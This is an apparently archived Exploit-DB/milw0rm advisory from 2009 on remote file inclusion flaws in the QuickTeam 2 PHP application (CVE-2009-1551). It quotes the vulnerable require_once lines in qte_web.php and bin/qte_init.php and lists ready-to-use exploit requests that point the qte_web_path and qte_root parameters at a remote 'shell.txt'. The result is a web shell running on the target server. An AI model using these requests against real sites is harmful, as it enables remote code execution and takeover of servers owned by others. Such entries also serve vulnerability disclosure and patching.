Qt quickteam Multiple Remote File Inclusion Vulnerabilities

2009-05-04T00:00:00
ID EDB-ID:8602
Type exploitdb
Reporter ahmadbady
Modified 2009-05-04T00:00:00

Description

Qt quickteam Multiple Remote File Inclusion Vulnerabilities. CVE-2009-1551. Webapps exploit for php platform

                                        
                                                            =-=-remote file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::quickteam 2
-------------------------------------------------
Author: ahmadbady
my site :Coming Soon
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
download from:http://www.qt-cute.org/download/qte2.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
vul:/qte_web.php
$qte_root = $qte_web_path;
require_once($qte_root.'bin/qte_init.php');
--
vul:/bin/qte_init.php
require_once($qte_root.'bin/config.php');
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=
xpl:
path/qte_web.php?qte_web_path=shell.txt?
path/bin/qte_init.php?qte_root=shell.txt?
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=
dork: :d
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=

# milw0rm.com [2009-05-04]